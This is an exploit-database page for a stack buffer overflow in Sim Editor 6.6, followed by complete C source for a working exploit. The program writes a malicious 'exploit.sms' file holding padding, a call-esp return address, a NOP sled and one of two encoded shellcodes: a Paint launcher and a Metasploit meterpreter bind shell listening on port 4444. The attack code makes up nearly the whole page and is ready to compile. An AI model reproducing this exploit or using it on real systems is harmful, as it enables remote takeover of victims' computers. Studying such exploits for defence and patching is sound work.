Sim Editor 6.6 Buffer Overflow

2015-01-18 / 2015-08-29
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#include <stdio.h> #include <stdlib.h> #include <string.h> #define SIZE 65536 /* * Title: Sim Editor v6.6 Stack Based Buffer Overflow * Version: 6.6 * Tested on: Windows XP sp2 en, Windows 8 64-bit * Date: 16-01-2015 * Author: Osanda Malith Jayathissa * E-Mail: osanda[cat]unseen.is * Website: OsandaMalith.wordpress.com */ void add(int count, unsigned char* dest, unsigned char *src); int menu(); void banner(); int main() { banner(); int i = menu(); unsigned char *buff, *nops; FILE *outfile; buff = (unsigned char*) malloc (SIZE); nops = (unsigned char*) malloc (SIZE); if (!buff) exit (1); buff[0] = nops[0] = 0; add(405, buff, "41"); add(16, nops, "90"); unsigned char ret[] = "D3804200"; /* 0x4280D3 call esp */ outfile = fopen("exploit.sms", "w"); if (!outfile) printf("%s\n","Could not open file"); fputs(buff, outfile); fputs(ret, outfile); fputs(nops, outfile); if(i == 1) { unsigned char shell[] = "ba516a43ddd9e9d97424f45e33c9b1" "3231561503561583eefce2a496ab54" "46672c07cf821d15abc70ca9b88abc" "42ec3e36263830ff8d1e7f00209ed3" "c222622e17855be16ac49c1c849475" "6a3709f22e8428d424b45251fa41e9" "582bf96612d3712082e25632feadd3" "81752c32d8761e7ab749ae77c98e09" "68bce46915c73f13c142ddb382f505" "454663ce4923e7884db224a36a3fcb" "63fb7be8a7a7d891fe0d8eaee0ea6f" "0b6b187b2d36777abf4d3e7cbf4d11" "158ec6fe620f0dbb9d450fea3500da" "ae5bb331ec6530b38d9128b688deee" "2be14f9b4b566f8e262bff50d1a58b" "92"; fputs(shell, outfile);} else if(i == 2) { /* msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R | msfencode -a x86 -t c */ unsigned char shell[] = "bb3ff8edc8dbc6d97424f45f2bc9b1" "4a83effc315f11035f11e2ca04054e" "34f5d62fbd10e77dd9515ab2aa3457" "39feacec4fd6c345e500ed56cb8ca1" "954d70b8c9ad49731caf8e6eeffd47" "e44212ecb85e99be2ce77e744cc6d0" "0317c8d3c02341cc050f1b67fdfb9a" "a1cc04ad8d823a0100db7ba6fbae77" "d486a843a65c3d560016e5b2b0fb73" "30beb0f01ea347d514dfccd8fa6996" "fede324c9f479f23a098479b04d26a" "c831b9e23d7342f3290431c1f6bedd" "697e18198d55dcb570561c9fb6024c" "b71f2b07479ffe87170f5167c8ef01" "0f02e07e2f2d2a179e098670e2ad38" "dd6b4b50cd3dc3cd2f1adc6a4f4970" "22c7c69ef4e8d7b45644705f2d8645" "7e3283ee17a5597e55575dab0f97cb" "5786c06355ff272ca62a3ce532952b" "0ad215ac5cb815c4389845f14635fa" "aad2b5ab1f74dd5179b242a9ac42bf" "7c89c0c90af908"; fputs(shell, outfile); puts("[*] Connect on port 4444");} else { puts("[-] Enter a valid input"); exit(-1); } fclose(outfile); free(buff); printf("%s","[+] Successfully to written to \"exploit.sms\""); return 0; } void add(int count, unsigned char* dest, unsigned char *src) { int i; for (i=0; i<count; i++) strcat(dest, src); } int menu() { int i; puts("\b[?] Choose an Option: "); puts("1. MS Paint"); puts("2. Bind Shell"); scanf("%i", &i); return i; } void banner() { static const char banner[] = " _____ _ _____ _ _ _ \n" "| __|_|_____ | __|_| |_| |_ ___ ___ \n" "|__ | | | | __| . | | _| . | _|\n" "|_____|_|_|_|_| |_____|___|_|_| |___|_|\n" "\n[~] Sim Editor v6.6 Stack Based Buffer Overflow\n" "[~] Author: Osanda Malith Jayathissa\n" "[~] E-Mail: osanda[cat]unseen.is\n" "[~] Website: OsandaMalith.wordpress.com\n\n"; fwrite(banner, sizeof(char), sizeof(banner) , stdout); }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top